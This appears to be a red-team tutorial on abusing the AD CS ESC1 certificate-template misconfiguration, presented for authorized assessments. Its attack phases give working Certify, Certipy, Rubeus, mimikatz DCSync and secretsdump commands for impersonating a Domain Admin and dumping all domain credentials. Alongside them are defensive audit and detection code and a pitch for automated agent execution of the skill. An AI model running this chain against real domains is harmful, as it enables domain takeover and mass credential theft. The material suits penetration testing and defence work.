Red Team & Offensive Security · Advanced

Exploiting Active Directory Certificate Services ESC1

Exploit misconfigured Active Directory Certificate Services (AD CS) ESC1 vulnerability to request certificates as high-privileged users and escalate domain privileges during authorized red team assessments.

4 min read · 7 code examples · 5 MITRE techniques

MITRE ATT&CK Coverage

T1649, T1558.001, T1078.002, T1484, T1087.002


Overview

ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Key Usage (EKU) that permits client authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose). This allows an attacker to specify an arbitrary Subject Alternative Name (SAN) in the certificate request, effectively impersonating any domain user. ESC1 was documented by SpecterOps researchers Will Schroeder and Lee Christensen in their "Certified Pre-Owned" whitepaper (2021) and remains one of the most common AD CS attack paths. The MITRE ATT&CK framework tracks this as T1649 (Steal or Forge Authentication Certificates).

Objectives

  • Enumerate AD CS infrastructure and certificate templates using Certify or Certipy
  • Identify vulnerable ESC1 templates with "Supply in Request" enabled
  • Request a certificate specifying a Domain Admin in the SAN field
  • Authenticate using the forged certificate via PKINIT to obtain a TGT
  • Escalate privileges to Domain Admin using the obtained Kerberos ticket
  • Document the full attack chain for the engagement report

MITRE ATT&CK Mapping

  • T1649 - Steal or Forge Authentication Certificates
  • T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1484 - Domain Policy Modification
  • T1087.002 - Account Discovery: Domain Account

Implementation Steps

Phase 1: AD CS Enumeration

  1. Enumerate Certificate Authority (CA) servers in the domain:

```powershell
# Using Certify (Windows)
Certify.exe cas

# Using Certipy (Linux/Python)
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1
```

  2. Enumerate all certificate templates and identify vulnerable ones:

```powershell
# Using Certify - find vulnerable templates
Certify.exe find /vulnerable

# Using Certipy - outputs JSON and text reports
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1 -vulnerable
```

  3. Verify ESC1 conditions on identified templates:
     • msPKI-Certificate-Name-Flag contains ENROLLEE_SUPPLIES_SUBJECT
     • pkiExtendedKeyUsage contains Client Authentication or Smart Card Logon
     • msPKI-Enrollment-Flag does not require manager approval
     • Low-privileged group (Domain Users, Authenticated Users) has Enroll rights

Phase 2: Certificate Request with Arbitrary SAN

  1. Request a certificate using the vulnerable template, specifying a Domain Admin in the SAN:

```powershell
# Using Certify (Windows)
Certify.exe request /ca:DC01.domain.local\domain-CA /template:VulnerableTemplate /altname:administrator

# Using Certipy (Linux)
certipy req -u user@domain.local -p 'Password123' -ca 'domain-CA' -target DC01.domain.local -template VulnerableTemplate -upn administrator@domain.local
```

  2. The CA issues a certificate with the Domain Admin's UPN in the SAN field
  3. Save the output certificate in PFX/PEM format

Phase 3: Authentication with Forged Certificate

  1. Convert the certificate if needed (Certify outputs PEM, convert to PFX):

```bash
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

  2. Authenticate using PKINIT to obtain a TGT for the impersonated user:

```powershell
# Using Rubeus (Windows)
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:<pfx-password> /ptt

# Using Certipy (Linux)
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
```

  3. The TGT is now loaded in memory (Windows) or the NT hash is recovered (Linux)

Phase 4: Domain Privilege Escalation

  1. With the Domain Admin TGT, perform privileged operations:

```powershell
# DCSync to dump all domain credentials
mimikatz.exe "lsadump::dcsync /domain:domain.local /all"

# Or using secretsdump.py with the obtained NT hash
secretsdump.py domain.local/administrator@DC01.domain.local -hashes :ntlmhash
```

  2. Validate Domain Admin access:

```powershell
# List domain controllers
dir \\DC01.domain.local\C$

# Access Domain Admin shares
dir \\DC01.domain.local\SYSVOL
```

Tools and Resources

| Tool | Purpose | Platform |
|---|---|---|
| Certify | AD CS enumeration and certificate requests | Windows (.NET) |
| Certipy | AD CS enumeration, request, and authentication | Linux (Python) |
| Rubeus | Kerberos authentication with certificates (PKINIT) | Windows (.NET) |
| Mimikatz | Credential dumping post-escalation | Windows |
| secretsdump.py | Remote credential dumping (Impacket) | Linux (Python) |
| PSPKIAudit | PowerShell AD CS auditing module | Windows |
| ForgeCert | Certificate forgery tool | Windows (.NET) |

Vulnerable Template Indicators

| Condition | Vulnerable Value |
|---|---|
| msPKI-Certificate-Name-Flag | ENROLLEE_SUPPLIES_SUBJECT (1) |
| pkiExtendedKeyUsage | Client Authentication (1.3.6.1.5.5.7.3.2) |
| Enrollment Rights | Domain Users or Authenticated Users |
| msPKI-Enrollment-Flag | No manager approval required |
| CA Setting | No approval workflow enforced |
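The conditions in the Phase 1 verification step and in the table above can be checked mechanically against the template objects read from the configuration naming context. The following Python is an added audit example, not code from this page nor from Certify, Certipy or PSPKIAudit. The flag constants and EKU OIDs are the real schema values; the `Template` records, domain SID and template names are constructed sample data. It goes one step beyond the table by also checking msPKI-RA-Signature (the standard ESC1 definition requires that no authorized signatures are needed), and it shows the remediation named under Validation Criteria, clearing Supply in Request and requiring manager approval, applied as a `harden()` function so the audit can confirm the fix.

```python
"""ESC1 template audit over LDAP-style certificate template attributes.

Added example with constructed sample data; not code from the page, Certify,
Certipy or PSPKIAudit. Attribute names follow the AD schema, the values are made up.
"""
from dataclasses import dataclass, replace
from typing import Dict, List

# Bits of msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag relevant to ESC1
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # "Supply in Request"
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # "CA certificate manager approval"

# EKU OIDs that let a certificate authenticate a principal (PKINIT / smart card logon)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}

# Principals every domain user effectively holds: well-known SIDs and domain RIDs
LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}   # Authenticated Users, Everyone
LOW_PRIV_RIDS = {"513"}                   # Domain Users


@dataclass(frozen=True)
class Template:
    name: str
    name_flag: int           # msPKI-Certificate-Name-Flag
    enrollment_flag: int     # msPKI-Enrollment-Flag
    ekus: tuple              # pkiExtendedKeyUsage as OID strings
    ra_signatures: int       # msPKI-RA-Signature (authorized signatures required)
    enroll_sids: tuple       # SIDs holding Enroll rights in the template's security descriptor


def is_low_priv(sid: str) -> bool:
    """True for SIDs that any authenticated domain user effectively holds."""
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc1_findings(t: Template) -> List[str]:
    """List the ESC1 conditions this template satisfies. ESC1 needs all five at once."""
    findings = []
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject/SAN (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)")
    auth = [AUTH_EKUS[o] for o in t.ekus if o in AUTH_EKUS]
    if auth:
        findings.append("authentication EKU present: " + ", ".join(auth))
    if not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval required")
    if t.ra_signatures == 0:
        findings.append("no authorized signatures required")
    low = [s for s in t.enroll_sids if is_low_priv(s)]
    if low:
        findings.append("Enroll granted to low-privileged principals: " + ", ".join(low))
    return findings


def is_esc1(t: Template) -> bool:
    return len(esc1_findings(t)) == 5


def harden(t: Template) -> Template:
    """Apply the page's remediation: clear Supply in Request and require manager approval."""
    return replace(
        t,
        name_flag=t.name_flag & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        enrollment_flag=t.enrollment_flag | CT_FLAG_PEND_ALL_REQUESTS,
    )


def audit(templates: List[Template]) -> Dict[str, List[str]]:
    """Map each ESC1-vulnerable template name to the conditions that make it so."""
    return {t.name: esc1_findings(t) for t in templates if is_esc1(t)}


# Constructed sample: one ESC1 template, one ordinary user template, one server template
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_TEMPLATES = [
    Template("VulnerableTemplate", 0x1, 0x0, ("1.3.6.1.5.5.7.3.2",), 0, (DOMAIN_SID + "-513",)),
    Template("StandardUser", 0x0, 0x0, ("1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"), 0, (DOMAIN_SID + "-513",)),
    Template("WebServer", 0x1, 0x0, ("1.3.6.1.5.5.7.3.1",), 0, (DOMAIN_SID + "-512",)),
]

if __name__ == "__main__":
    for name, why in audit(SAMPLE_TEMPLATES).items():
        print(f"[ESC1] {name}")
        for w in why:
            print(f"    - {w}")
    fixed = harden(SAMPLE_TEMPLATES[0])
    print(f"after hardening, {fixed.name} is ESC1: {is_esc1(fixed)}")
```

Either half of `harden()` alone is enough to break the chain; the audit reports which conditions survive so that a reviewer can see why a template no longer qualifies rather than just a yes/no.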

Detection Signatures

| Indicator | Detection Method |
|---|---|
| Certificate request with SAN different from requester | Windows Event 4886 / 4887 on CA server |
| Unusual PKINIT authentication | Event 4768 with certificate-based pre-auth |
| Certify.exe or Certipy execution | EDR process monitoring and command-line logging |
| Mass certificate template enumeration | LDAP query monitoring for pkiCertificateTemplate objects |
| Certificate issued to non-matching UPN | CA audit logs and certificate transparency |
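To make the first row of the table concrete, here is an added Python detection example that is not part of the original page. It parses Event 4887 message bodies in the shape the CA logs them (Request ID, Requester, Attributes), joins each Request ID with the UPN found in the issued certificate's SAN, and flags certificates whose SAN names a different account than the Requester. The 4887 event itself carries no SAN field, so the example assumes the SAN UPNs are exported separately from the CA database and joined on Request ID; every event text, account name and SAN value below is constructed sample data.

```python
"""Flag issued certificates whose SAN UPN names a different account than the requester.

Added example with constructed sample data; not code from the page. The event
text mimics the Event 4887 message the page cites; the SAN UPNs stand in for the
subjectAltName read from each issued certificate in the CA database (assumption:
exported separately and joined on Request ID, since 4887 itself has no SAN field).
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class IssuedCert:
    request_id: int
    requester: str           # "DOMAIN\\sAMAccountName" as logged in the Requester field
    template: str            # CertificateTemplate value from the Attributes field
    san_upn: Optional[str]   # UPN from the issued certificate's SAN, None if absent


_FIELD = re.compile(r"^(Request ID|Requester|Attributes):\s*(.+?)\s*$", re.M)
_TEMPLATE = re.compile(r"CertificateTemplate:([^,\s]+)")


def parse_4887(message: str, san_by_request: Dict[int, str]) -> IssuedCert:
    """Parse one 4887 message body and attach the SAN UPN of the issued certificate."""
    fields = dict(_FIELD.findall(message))
    req_id = int(fields["Request ID"])
    m = _TEMPLATE.search(fields.get("Attributes", ""))
    return IssuedCert(req_id, fields["Requester"], m.group(1) if m else "", san_by_request.get(req_id))


def account_of(principal: str) -> str:
    """Normalize DOMAIN\\name or name@domain to a lowercase sAMAccountName."""
    if "\\" in principal:
        return principal.split("\\", 1)[1].lower()
    return principal.split("@", 1)[0].lower()


def san_mismatches(records: Iterable[IssuedCert], allowed_templates: Iterable[str] = ()) -> List[IssuedCert]:
    """Return certificates whose SAN UPN belongs to someone other than the requester.

    Templates in allowed_templates (e.g. a legitimate enrollment-agent flow) are skipped;
    certificates without a UPN SAN are not comparable and are skipped too.
    """
    allowed = set(allowed_templates)
    return [
        r for r in records
        if r.san_upn is not None
        and r.template not in allowed
        and account_of(r.san_upn) != account_of(r.requester)
    ]


def find_alerts(messages: Iterable[str], san_by_request: Dict[int, str],
                allowed_templates: Iterable[str] = ()) -> List[IssuedCert]:
    """Parse raw 4887 bodies and return the mismatching issuances."""
    return san_mismatches((parse_4887(m, san_by_request) for m in messages), allowed_templates)


# Constructed sample: three 4887 events and the SAN UPNs of the certificates they issued
SAMPLE_EVENTS = [
    "Certificate Services approved a certificate request and issued a certificate.\n\n"
    "Request ID: 1042\nRequester: DOMAIN\\lowpriv\n"
    "Attributes: CertificateTemplate:VulnerableTemplate\nDisposition: 3\n"
    "SKI: 11 22 33\nSubject: CN=administrator\n",
    "Certificate Services approved a certificate request and issued a certificate.\n\n"
    "Request ID: 1043\nRequester: DOMAIN\\alice\n"
    "Attributes: CertificateTemplate:StandardUser\nDisposition: 3\n"
    "SKI: 44 55 66\nSubject: CN=alice, CN=Users, DC=domain, DC=local\n",
    "Certificate Services approved a certificate request and issued a certificate.\n\n"
    "Request ID: 1044\nRequester: DOMAIN\\WEB01$\n"
    "Attributes: CertificateTemplate:WebServer\nDisposition: 3\n"
    "SKI: 77 88 99\nSubject: CN=web01.domain.local\n",
]
SAMPLE_SAN_UPNS = {1042: "administrator@domain.local", 1043: "Alice@domain.local"}

if __name__ == "__main__":
    for a in find_alerts(SAMPLE_EVENTS, SAMPLE_SAN_UPNS):
        print(f"ALERT request {a.request_id}: {a.requester} obtained a certificate "
              f"for {a.san_upn} via template {a.template}")
```

The comparison is on sAMAccountName only, so a case difference in the UPN is not an alert, while a requester obtaining a certificate for any other principal is. Templates that legitimately issue on behalf of others go in `allowed_templates` rather than being silently dropped from the data.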

Validation Criteria

  • [ ] AD CS Certificate Authority enumerated
  • [ ] Vulnerable ESC1 templates identified with Certify or Certipy
  • [ ] Certificate requested with Domain Admin SAN successfully
  • [ ] PKINIT authentication performed with forged certificate
  • [ ] Domain Admin TGT obtained
  • [ ] Privileged access to domain controller validated
  • [ ] Full attack chain documented with evidence
  • [ ] Remediation recommendations provided (disable Supply in Request, require manager approval)

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

  • SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
  • ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
  • NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
  • NIST CSF: ID.RA (Risk Assessment), PR.IP (Information Protection)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

Register this skill with your Claw GRC agent for automated execution:

```
# Install via CLI
npx claw-grc skills add exploiting-active-directory-certificate-services-esc1

# Or load dynamically via MCP
grc.load_skill("exploiting-active-directory-certificate-services-esc1")
```

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

  • SHA-256 chain hashing ensures no step can be modified after execution
  • Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
  • Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Tags

red-team, active-directory, ad-cs, esc1, certificate-abuse, privilege-escalation, domain-escalation
